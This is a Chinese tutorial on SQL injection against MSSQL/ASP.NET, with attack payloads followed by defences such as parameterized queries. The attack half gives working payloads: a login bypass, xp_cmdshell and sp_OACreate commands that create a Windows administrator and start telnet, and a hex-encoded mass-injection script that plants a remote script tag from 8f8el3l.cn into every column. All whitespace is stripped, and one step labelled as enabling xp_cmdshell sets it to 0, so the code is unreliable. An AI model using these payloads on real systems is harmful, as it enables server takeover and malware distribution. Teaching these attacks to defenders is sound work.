尝尝SQL注入
1.一个简单的登录页面
关键代码:(详细见下载的示例代码)
privateboolNoProtectLogin(stringuserName,stringpassword)
{
intcount=(int)SqlHelper.Instance.ExecuteScalar(string.Format
("SELECTCOUNT(*)FROMLoginWHEREUserName='{0}'ANDPassword='{1}'",userName,password));
returncount>0?true:false;
}
方法中userName和password是没有经过任何处理,直接拿前端传入的数据,这样拼接的SQL会存在注入漏洞。(账户:admin123456)
1)输入正常数据,效果如图:
合并的SQL为:
SELECTCOUNT(*)FROMLoginWHEREUserName='admin'ANDPassword='123456'
2)输入注入数据:
如图,即用户名为:用户名:admin’—,密码可随便输入
合并的SQL为:
SELECTCOUNT(*)FROMLoginWHEREUserName='admin'--Password='123'
因为UserName值中输入了“--”注释符,后面语句被省略而登录成功。(常常的手法:前面加上';'(分号,用于结束前一条语句),后边加上'--'(用于注释后边的语句))
2.上面是最简单的一种SQL注入,常见的注入语句还有:
1)猜测数据库名,备份数据库
a)猜测数据库名:anddb_name()>0或系统表master.dbo.sysdatabases
b)备份数据库:;backupdatabase数据库名todisk=‘c:\*.db’;--
或:declare@asysname;set@a=db_name();backupdatabase@atodisk='你的IP你的共享目录bak.dat',name='test';--
2)猜解字段名称
a)拆解法:and(selectcount(字段名)from表名)>0若“字段名”存在,则返回正常
b)读取法:and(selecttop1col_name(object_id('表名'),1)fromsysobjects)>0把col_name(object_id('表名'),1)中的1依次换成2,3,4,5,6…就可以得到所有的字段名称。
3)遍历系统的目录结构,分析结构并发现WEB虚拟目录(服务器上传木马)
先创建一个临时表:;createtabletemp(idnvarchar(255),num1nvarchar(255),num2nvarchar(255),num3nvarchar(255));--
a)利用xp_availablemedia来获得当前所有驱动器,并存入temp表中
;inserttempexecmaster.dbo.xp_availablemedia;--
b)利用xp_subdirs获得子目录列表,并存入temp表中
;insertintotemp(id)execmaster.dbo.xp_subdirs'c:\';--
c)利用xp_dirtree可以获得“所有”子目录的目录树结构,并存入temp表中
;insertintotemp(id,num1)execmaster.dbo.xp_dirtree'c:\';--(实验成功)
d)利用bcp命令将表内容导成文件
即插入木马文本,然后导出存为文件。比如导出为asp文件,然后通过浏览器访问该文件并执行恶意脚本。(使用该命令必须启动’xp_cmdshell’)
Execmaster..xp_cmdshellN'BCP"select*fromSchoolMarket.dbo.GoodsStoreData;"queryoutc:/inetpub/wwwroot/runcommand.asp-w-S"localhost"-U"sa"-P"123"'
(注意:语句中使用的是双引号,另外表名格式为“数据库名.用户名.表名”)
在sql查询器中通过语句:Execmaster..xp_cmdshellN'BCP’即可查看BCP相关参数,如图:
4)查询当前用户的数据库权限
MSSQL中一共存在8种权限:sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin,bulkadmin。
可通过1=(selectIS_SRVROLEMEMBER('sysadmin'))得到当前用户是否具有该权限。
5)设置新的数据库帐户(得到MSSQL管理员账户)
d)在数据库内添加一个hax用户,默认密码是空的
;execsp_addlogin'hax';--
e)给hax设置密码(null是旧密码,password是新密码,user是用户名)
;execmaster.dbo.sp_passwordnull,password,username;--
f)将hax添加到sysadmin组
;execmaster.dbo.sp_addsrvrolemember'hax','sysadmin';--
6)xp_cmdshellMSSQL存储过程(得到WINDOWS管理员账户)
通过(5)获取到sysadmin权限的帐户后,使用查询分析器连接到数据库,可通过xp_cmdshell运行系统命令行(必须是sysadmin权限),即使用cmd.exe工具,可以做什么自己多了解下。
下面我们使用xp_cmdshell来创建一个Windows用户,并开启远程登录服务:
a)判断xp_cmdshell扩展存储过程是否存在
SELECTcount(*)FROMmaster.dbo.sysobjectsWHERExtype='X'ANDname='xp_cmdshell'
b)恢复xp_cmdshell扩展存储过程
Execmaster.dbo.sp_addextendedproc'xp_cmdshell','e:\inetput\web\xplog70.dll';
开启后使用xp_cmdshell还会报下面错误:
SQLServer阻止了对组件'xp_cmdshell'的过程'sys.xp_cmdshell'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'xp_cmdshell'。有关启用'xp_cmdshell'的详细信息,请参阅SQLServer联机丛书中的"外围应用配置器"。
通过执行下面的语句进行设置:
--允许配置高级选项
EXECsp_configure'showadvancedoptions',1
GO
--重新配置
RECONFIGURE
GO
--启用xp_cmdshell
EXECsp_configure'xp_cmdshell',0
GO
--重新配置
RECONFIGURE
GO
c)禁用xp_cmdshell扩展存储过程
Execmaster.dbo.sp_dropextendedproc'xp_cmdshell';
d)添加windows用户:
Execxp_cmdshell'netuserawen/add';
e)设置好密码:
Execxp_cmdshell'netuserawenpassword';
f)提升到管理人员:
Execxp_cmdshell'netlocalgroupadministratorsawen/add';
g)开启telnet服务:
Execxp_cmdshell'netstarttlntsvr'
7)没有xp_cmdshell扩展程序,也可创建Windows帐户的办法.
(本人windows7系统,测试下面SQL语句木有效果)
declare@shellint;
execsp_OAcreate'wscript.shell',@shelloutput;
execsp_OAmethod@shell,'run',null,'C:\Windows\System32\cmd.exe/cnetuserawen/add';
execsp_OAmethod@shell,'run',null,'C:\Windows\System32\cmd.exe/cnetuserawen123';
execsp_OAmethod@shell,'run',null,'C:\Windows\System32\cmd.exe/cnetlocalgroupadministratorsawen/add';
在使用的时候会报如下错:
SQLServer阻止了对组件'OleAutomationProcedures'的过程'sys.sp_OACreate'、'sys.sp_OAMethod'的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用sp_configure启用'OleAutomationProcedures'。有关启用'OleAutomationProcedures'的详细信息,请参阅SQLServer联机丛书中的"外围应用配置器"。
解决办法:
sp_configure'showadvancedoptions',1;
GO
RECONFIGURE;
GO
sp_configure'OleAutomationProcedures',1;
GO
RECONFIGURE;
GO
好了,这样别人可以登录你的服务器了,你怎么看?
8)客户端脚本攻击
攻击1:(正常输入)攻击者通过正常的输入提交方式将恶意脚本提交到数据库中,当其他用户浏览此内容时就会受到恶意脚本的攻击。
措施:转义提交的内容,.NET中可通过System.Net.WebUtility.HtmlEncode(string)方法将字符串转换为HTML编码的字符串。
攻击2:(SQL注入)攻击者通过SQL注入方式将恶意脚本提交到数据库中,直接使用SQL语法UPDATE数据库,为了跳过System.Net.WebUtility.HtmlEncode(string)转义,攻击者会将注入SQL经过“HEX编码”,然后通过exec可以执行“动态”SQL的特性运行脚本”。
参考:
注入:SQL注入案例曝光,请大家提高警惕
恢复:批量清除数据库中被植入的js
示例代码:(可在示例附带的数据库测试)
a)向当前数据库的每个表的每个字段插入一段恶意脚本
1
2
3
4
5
6
7
8
9
10
11
12
13
Declare@TVarchar(255),@CVarchar(255)
DeclareTable_CursorCursorFor
SelectA.Name,B.Name
FromSysobjectsA,SyscolumnsBWhereA.Id=B.IdAndA.Xtype='u'And(B.Xtype=99OrB.Xtype=35OrB.Xtype=231OrB.Xtype=167)
OpenTable_Cursor
FetchNextFromTable_CursorInto@T,@C
While(@@Fetch_Status=0)
Begin
Exec('update['+@T+']Set['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''<scriptsrc=http://8f8el3l.cn/0.js></script>''')
FetchNextFromTable_CursorInto@T,@C
End
CloseTable_Cursor
DeallocateTable_Cursor
b)更高级的攻击,将上面的注入SQL进行“HEX编码”,从而避免程序的关键字检查、脚本转义等,通过EXEC执行
dEcLaRe@svArChAr(8000)sEt@s=0x4465636c617265204054205661726368617228323535292c4043205661726368617228323535290d0a4465636c617265205461626c655f437572736f7220437572736f7220466f722053656c65637420412e4e616d652c422e4e616d652046726f6d205379736f626a6563747320412c537973636f6c756d6e73204220576865726520412e49643d422e496420416e6420412e58747970653d27752720416e642028422e58747970653d3939204f7220422e58747970653d3335204f7220422e58747970653d323331204f7220422e58747970653d31363729204f70656e205461626c655f437572736f72204665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c4043205768696c6528404046657463685f5374617475733d302920426567696e20457865632827757064617465205b272b40542b275d20536574205b272b40432b275d3d527472696d28436f6e7665727428566172636861722838303030292c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f386638656c336c2e636e2f302e6a733e3c2f7363726970743e272727294665746368204e6578742046726f6d20205461626c655f437572736f7220496e746f2040542c404320456e6420436c6f7365205461626c655f437572736f72204465616c6c6f63617465205461626c655f437572736f72;
eXeC(@s);--
c)批次删除数据库被注入的脚本
declare@delStrnvarchar(500)
set@delStr='<scriptsrc=http://8f8el3l.cn/0.js></script>'--要被替换掉字符
setnocounton
declare@tableNamenvarchar(100),@columnNamenvarchar(100),@tbIDint,@iRowint,@iResultint
declare@sqlnvarchar(500)
set@iResult=0
declarecurcursorfor
selectname,idfromsysobjectswherextype='U'
opencur
fetchnextfromcurinto@tableName,@tbID
while@@fetch_status=0
begin
declarecur1cursorfor
--xtypein(231,167,239,175)为char,varchar,nchar,nvarchar类型
selectnamefromsyscolumnswherextypein(231,167,239,175)andid=@tbID
opencur1
fetchnextfromcur1into@columnName
while@@fetch_status=0
begin
set@sql='update['+@tableName+']set['+@columnName+']=replace(['+@columnName+'],'''+@delStr+''','''')where['+@columnName+']like''%'+@delStr+'%'''
execsp_executesql@sql
set@iRow=@@rowcount
set@iResult=@iResult+@iRow
if@iRow>0
begin
print'表:'+@tableName+',列:'+@columnName+'被更新'+convert(varchar(10),@iRow)+'条记录;'
end
fetchnextfromcur1into@columnName
end
closecur1
deallocatecur1
fetchnextfromcurinto@tableName,@tbID
end
print'数据库共有'+convert(varchar(10),@iResult)+'条记录被更新!!!'
closecur
deallocatecur
setnocountoff
d)我如何得到“HEX编码”?
开始不知道HEX是什么东西,后面查了是“十六进制”,网上已经给出两种转换方式:(注意转换的时候不要加入十六进制的标示符’0x’)
Ø在线转换(TRANSLATOR,BINARY),进入……
ØC#版的转换,进入……
9)对于敏感词过滤不到位的检查,我们可以结合函数构造SQL注入
比如过滤了update,却没有过滤declare、exec等关键词,我们可以使用reverse来将倒序的sql进行注入:
declare@Avarchar(200);set@A=reverse('''58803303431''=emanresuerehw''9d4d9c1ac9814f08''=drowssaPtesxxxtadpu');
防止SQL注入
1.数据库权限控制,只给访问数据库的web应用功能所需的最低权限帐户。
如MSSQL中一共存在8种权限:sysadmin,dbcreator,diskadmin,processadmin,serveradmin,setupadmin,securityadmin,bulkadmin。
2.自定义错误信息,首先我们要屏蔽服务器的详细错误信息传到客户端。
在ASP.NET中,可通过web.config配置文件的<customErrors>节点设置:
<customErrorsdefaultRedirect="url"mode="On|Off|RemoteOnly">
<error.../>
</customErrors>
更详细,请进入……
mode:指定是启用或禁用自定义错误,还是仅向远程客户端显示自定义错误。
On
指定启用自定义错误。如果未指定defaultRedirect,用户将看到一般性错误。
Off
指定禁用自定义错误。这允许显示标准的详细错误。
RemoteOnly
指定仅向远程客户端显示自定义错误并且向本地主机显示ASP.NET错误。这是默认值。
看下效果图:
设置为<customErrorsmode="On">一般性错误:
设置为<customErrorsmode="Off">:
3.把危险的和不必要的存储过程删除
xp_:扩展存储过程的前缀,SQL注入攻击得手之后,攻击者往往会通过执行xp_cmdshell之类的扩展存储过程,获取系统信息,甚至控制、破坏系统。
xp_cmdshell
能执行dos命令,通过语句sp_dropextendedproc删除,
不过依然可以通过sp_addextendedproc来恢复,因此最好删除或改名xplog70.dll(sqlserver2000、windows7)
xpsql70.dll(sqlserer7.0)
xp_fileexist
用来确定一个文件是否存在
xp_getfiledetails
可以获得文件详细资料
xp_dirtree
可以展开你需要了解的目录,获得所有目录深度
Xp_getnetname
可以获得服务器名称
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite
可以访问注册表的存储过程
Sp_OACreate
Sp_OADestroy
Sp_OAGetErrorInfo
Sp_OAGetProperty
Sp_OAMethod
Sp_OASetProperty
Sp_OAStop
如果你不需要请丢弃OLE自动存储过程
4.非参数化SQL与参数化SQL
1)非参数化(动态拼接SQL)
a)检查客户端脚本:若使用.net,直接用System.Net.WebUtility.HtmlEncode(string)将输入值中包含的《HTML特殊转义字符》转换掉。
b)类型检查:对接收数据有明确要求的,在方法内进行类型验证。如数值型用int.TryParse(),日期型用DateTime.TryParse(),只能用英文或数字等。
c)长度验证:要进行必要的注入,其语句也是有长度的。所以如果你原本只允许输入10字符,那么严格控制10个字符长度,一些注入语句就没办法进行。
d)使用枚举:如果只有有限的几个值,就用枚举。
e)关键字过滤:这个门槛比较高,因为各个数据库存在关键字,内置函数的差异,所以对编写此函数的功底要求较高。如公司或个人有积累一个比较好的通用过滤函数还请留言分享下,学习学习,谢谢!
这边提供一个关键字过滤参考方案(MSSQL):
publicstaticboolValiParms(stringparms)
{
if(parms==null)
{
returnfalse;
}
Regexregex=newRegex("sp_",RegexOptions.IgnoreCase);
Regexregex2=newRegex("'",RegexOptions.IgnoreCase);
Regexregex3=newRegex("create",RegexOptions.IgnoreCase);
Regexregex4=newRegex("drop",RegexOptions.IgnoreCase);
Regexregex5=newRegex("\"",RegexOptions.IgnoreCase);
Regexregex6=newRegex("exec",RegexOptions.IgnoreCase);
Regexregex7=newRegex("xp_",RegexOptions.IgnoreCase);
Regexregex8=newRegex("insert",RegexOptions.IgnoreCase);
Regexregex9=newRegex("delete",RegexOptions.IgnoreCase);
Regexregex10=newRegex("select",RegexOptions.IgnoreCase);
Regexregex11=newRegex("update",RegexOptions.IgnoreCase);
return(regex.IsMatch(parms)||(regex2.IsMatch(parms)||(regex3.IsMatch(parms)||(regex4.IsMatch(parms)||(regex5.IsMatch(parms)||(regex6.IsMatch(parms)||(regex7.IsMatch(parms)||(regex8.IsMatch(parms)||(regex9.IsMatch(parms)||(regex10.IsMatch(parms)||(regex11.IsMatch(parms))))))))))));
}
优点:写法相对简单,网络传输量相对参数化拼接SQL小
缺点:
a)对于关键字过滤,常常“顾此失彼”,如漏掉关键字,系统函数,对于HEX编码的SQL语句没办法识别等等,并且需要针对各个数据库封装函数。
b)无法满足需求:用户本来就想发表包含这些过滤字符的数据。
c)执行拼接的SQL浪费大量缓存空间来存储只用一次的查询计划。服务器的物理内存有限,SQLServer的缓存空间也有限。有限的空间应该被充分利用。
2)参数化查询(ParameterizedQuery)
a)检查客户端脚本,类型检查,长度验证,使用枚举,明确的关键字过滤这些操作也是需要的。他们能尽早检查出数据的有效性。
b)参数化查询原理:在使用参数化查询的情况下,数据库服务器不会将参数的内容视为SQL指令的一部份来处理,而是在数据库完成SQL指令的编译后,才套用参数运行,因此就算参数中含有具有损的指令,也不会被数据库所运行。
c)所以在实际开发中,入口处的安全检查是必要的,参数化查询应作为最后一道安全防线。
优点:
Ø防止SQL注入(使单引号、分号、注释符、xp_扩展函数、拼接SQL语句、EXEC、SELECT、UPDATE、DELETE等SQL指令无效化)
Ø参数化查询能强制执行类型和长度检查。
Ø在MSSQL中生成并重用查询计划,从而提高查询效率(执行一条SQL语句,其生成查询计划将消耗大于50%的时间)
缺点:
Ø不是所有数据库都支持参数化查询。目前Access、SQLServer、MySQL、SQLite、Oracle等常用数据库支持参数化查询。
疑问:参数化如何“批量更新”数据库。
a)通过在参数名上增加一个计数来区分开多个参数化语句拼接中的同名参数。
EG:
StringBuildersqlBuilder=newStringBuilder(512);
Intcount=0;
For(循环)
{
sqlBuilder.AppendFormat(“UPDATEloginSETpassword=@password{0}WHEREusername=@userName{0}”,count.ToString());
SqlParameterpara=newSqlParamter(){ParameterName=@password+count.ToString()}
……
Count++;
}
b)通过MSSQL2008的新特性:表值参数,将C#中的整个表当参数传递给存储过程,由SQL做逻辑处理。注意C#中参数设置parameter.SqlDbType=System.Data.SqlDbType.Structured;详细请查看……
疑虑:有部份的开发人员可能会认为使用参数化查询,会让程序更不好维护,或者在实现部份功能上会非常不便,然而,使用参数化查询造成的额外开发成本,通常都远低于因为SQL注入攻击漏洞被发现而遭受攻击,所造成的重大损失。
另外:想验证重用查询计划的同学,可以使用下面两段辅助语法
--清空缓存的查询计划
DBCCFREEPROCCACHE
GO
--查询缓存的查询计划
SELECTstats.execution_countAScnt,p.size_in_bytesAS[size],[sql].[text]AS[plan_text]
FROMsys.dm_exec_cached_plansp
OUTERAPPLYsys.dm_exec_sql_text(p.plan_handle)sql
JOINsys.dm_exec_query_statsstatsONstats.plan_handle=p.plan_handle
GO
3)参数化查询示例
效果如图:
参数化关键代码:
PrivateboolProtectLogin(stringuserName,stringpassword)
{
SqlParameter[]parameters=newSqlParameter[]
{
newSqlParameter{ParameterName="@UserName",SqlDbType=SqlDbType.NVarChar,Size=10,Value=userName},
newSqlParameter{ParameterName="@Password",SqlDbType=SqlDbType.VarChar,Size=20,Value=password}
};
intcount=(int)SqlHelper.Instance.ExecuteScalar
("SELECTCOUNT(*)FROMLoginWHEREUserName=@UserNameANDPassword=@password",parameters);
returncount>0?true:false;
}
5.存储过程
存储过程(StoredProcedure)是在大型数据库系统中,一组为了完成特定功能的SQL语句集,经编译后存储在数据库中,用户通过指定存储过程的名字并给出参数(如果该存储过程带有参数)来执行它。
优点:
a)安全性高,防止SQL注入并且可设定只有某些用户才能使用指定存储过程。
b)在创建时进行预编译,后续的调用不需再重新编译。
c)可以降低网络的通信量。存储过程方案中用传递存储过程名来代替SQL语句。
缺点:
a)非应用程序内联代码,调式麻烦。
b)修改麻烦,因为要不断的切换开发工具。(不过也有好的一面,一些易变动的规则做到存储过程中,如变动就不需要重新编译应用程序)
c)如果在一个程序系统中大量的使用存储过程,到程序交付使用的时候随着用户需求的增加会导致数据结构的变化,接着就是系统的相关问题了,最后如果用户想维护该系统可以说是很难很难(eg:没有VS的查询功能)。
演示请下载示例程序,关键代码为:
cmd.CommandText=procName;//传递存储过程名
cmd.CommandType=CommandType.StoredProcedure;//标识解析为存储过程
如果在存储过程中SQL语法很复杂需要根据逻辑进行拼接,这时是否还具有放注入的功能?
答:MSSQL中可以通过EXEC和sp_executesql动态执行拼接的sql语句,但sp_executesql支持替换Transact-SQL字符串中指定的任何参数值,EXECUTE语句不支持。所以只有使用sp_executesql方式才能启到参数化防止SQL注入。
关键代码:(详细见示例)
a)sp_executesql
CREATEPROCEDUREPROC_Login_executesql(
@userNamenvarchar(10),
@passwordnvarchar(10),
@countintOUTPUT
)
AS
BEGIN
DECLARE@snvarchar(1000);
set@s=N'SELECT@count=COUNT(*)FROMLoginWHEREUserName=@userNameANDPassword=@password';
EXECsp_executesql@s,N'@userNamenvarchar(10),@passwordnvarchar(10),@countintoutput',@userName=@userName,@password=@password,@count=@countoutput
END
b)EXECUTE(注意sql中拼接字符,对于字符参数需要额外包一层单引号,需要输入两个单引号来标识sql中的一个单引号)
CREATEPROCEDUREPROC_Login_EXEC(
@userNamenvarchar(10),
@passwordvarchar(20)
)
AS
BEGIN
DECLARE@snvarchar(1000);
set@s='SELECT@count=COUNT(*)FROMLoginWHEREUserName='''+CAST(@userNameASNVARCHAR(10))+'''ANDPassword='''+CAST(@passwordASVARCHAR(20))+'''';
EXEC('DECLARE@countint;'+@s+'select@count');
END
注入截图如下:
6.专业的SQL注入工具及防毒软件
情景1
A:“丫的,又中毒了……”
B:“我看看,你这不是裸机在跑吗?”
电脑上至少也要装一款杀毒软件或木马扫描软件,这样可以避免一些常见的侵入。比如开篇提到的SQL创建windows帐户,就会立马报出警报。
情景2
A:“终于把网站做好了,太完美了,已经检查过没有漏洞了!”
A:“网站怎么被黑了,怎么入侵的???”
公司或个人有财力的话还是有必要购买一款专业SQL注入工具来验证下自己的网站,这些工具毕竟是专业的安全人员研发,在安全领域都有自己的独到之处。SQL注入工具介绍:10个SQL注入工具
7.额外小知识:LIKE中的通配符
尽管这个不属于SQL注入,但是其被恶意使用的方式是和SQL注入类似的。
参考:SQL中通配符的使用
%
包含零个或多个字符的任意字符串。
_
任何单个字符。
[]
指定范围(例如[a-f])或集合(例如[abcdef])内的任何单个字符。
[^]
不在指定范围(例如[^a-f])或集合(例如[^abcdef])内的任何单个字符。
在模糊查询LIKE中,对于输入数据中的通配符必须转义,否则会造成客户想查询包含这些特殊字符的数据时,这些特殊字符却被解析为通配符。不与LIKE一同使用的通配符将解释为常量而非模式。
注意使用通配符的索引性能问题:
a)like的第一个字符是'%'或'_'时,为未知字符不会使用索引,sql会遍历全表。
b)若通配符放在已知字符后面,会使用索引。
网上有这样的说法,不过我在MSSQL中使用ctrl+L执行语法查看索引使用情况却都没有使用索引,可能在别的数据库中会使用到索引吧……
截图如下:
有两种将通配符转义为普通字符的方法:
1)使用ESCAPE关键字定义转义符(通用)
在模式中,当转义符置于通配符之前时,该通配符就解释为普通字符。例如,要搜索在任意位置包含字符串5%的字符串,请使用:
WHEREColumnALIKE'%5/%%'ESCAPE'/'
2)在方括号([])中只包含通配符本身,或要搜索破折号(-)而不是用它指定搜索范围,请将破折号指定为方括号内的第一个字符。EG:
符号
含义
LIKE'5[%]'
5%
LIKE'5%'
5后跟0个或多个字符的字符串
LIKE'[_]n'
_n
LIKE'_n'
an,in,on(andsoon)
LIKE'[a-cdf]'
a、b、c、d或f
LIKE'[-acdf]'
-、a、c、d或f
LIKE'[[]'
[
LIKE']'
](右括号不需要转义)
所以,进行过输入参数的关键字过滤后,还需要做下面转换确保LIKE的正确执行
privatestaticstringConvertSqlForLike(stringsql)
{
sql=sql.Replace("[","[[]");//这句话一定要在下面两个语句之前,否则作为转义符的方括号会被当作数据被再次处理
sql=sql.Replace("_","[_]");
sql=sql.Replace("%","[%]");
returnsql;
}
结束语:感谢你耐心的观看。恭喜你,SQL安全攻防你已经入门了……